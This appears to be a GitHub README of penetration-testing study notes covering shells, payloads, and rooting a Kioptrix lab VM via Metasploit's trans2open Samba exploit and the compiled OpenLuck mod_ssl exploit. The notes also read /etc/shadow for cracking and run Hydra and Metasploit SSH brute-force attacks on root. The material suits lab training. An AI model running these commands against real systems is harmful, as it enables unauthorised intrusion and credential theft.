Skip to content

Latest commit

 

History

History
120 lines (71 loc) · 2.47 KB

README.md

File metadata and controls

120 lines (71 loc) · 2.47 KB

Exploitation Basics

  • Shell - gives access to a machine

  • Reverse shell - target machine connects to us; we listen to it; commonly used.

  • Bind shell - we open up a port on target machine and then connect to it.

  • Payloads - code run as an exploit; sent to victim to get shell access.

  • Non-staged payload - sends exploit shellcode all at once; larger; does not always work. For example, windows/meterpreter_reverse_tcp.

  • Staged payload - sends payload in stages; less stable. For example, windows/meterpreter/reverse_tcp.

  • Gaining root with Metasploit:

msfconsole

search trans2open #name of exploit for Samba

use 1 #use exploit/linux/samba/trans2open

options

set RHOSTS 10.0.2.4

show targets #only one (selected) option, Samba 2.2.x

exploit
#does not work due to default payload (staged), so we stop the process and change our payload to non-staged

set payload linux/x86/shell_reverse_tcp
#similar to previous one, but non-staged

options

exploit
#this gives us shell access of root

whoami
#root

hostname
#kioptrix.level1
  • Gaining root with manual exploitation:
mkdir kioptrix

cd kioptrix/

git clone https://github.com/heltonWernik/OpenLuck.git #exploit for mod_ssl

cd OpenLuck/

ls

apt install libssl-dev #install ssl-dev library

gcc -o openluck OpenFuck.c -lcrypto #compile the program

ls #shows openluck executable

./openluck #shows usage
#from enumeration, we know that target is using RedHat Linux and Apache 1.3.20, so we accordingly use the script

./openluck 0x6b 10.0.2.4 -c 40
#executes the script
#now we have access

whoami
#root

cat /etc/passwd
#shows users

cat /etc/shadow
#shows hashed passwords
#both /etc/passwd and /etc/shadow can be combined to decipher the passwords
  • Brute force attack:
#using Hydra

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://10.0.2.4 -t 4 -V
#we want to attack root using unix_passwords.txt wordlist in 4 threads; -V is for verbosity
#using Metasploit

msfconsole

search ssh

use auxiliary/scanner/ssh/ssh_login

options

set username root

set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

set rhosts 10.0.2.4

set threads 5

set verbose true

exploit

  • Credential stuffing - Injecting breached account credentials in hopes of account takeover; we can do this using Intruder window in Burp Suite.

  • Password spraying - Brute force logins based on list of usernames and common passwords; similar to credential stuffing.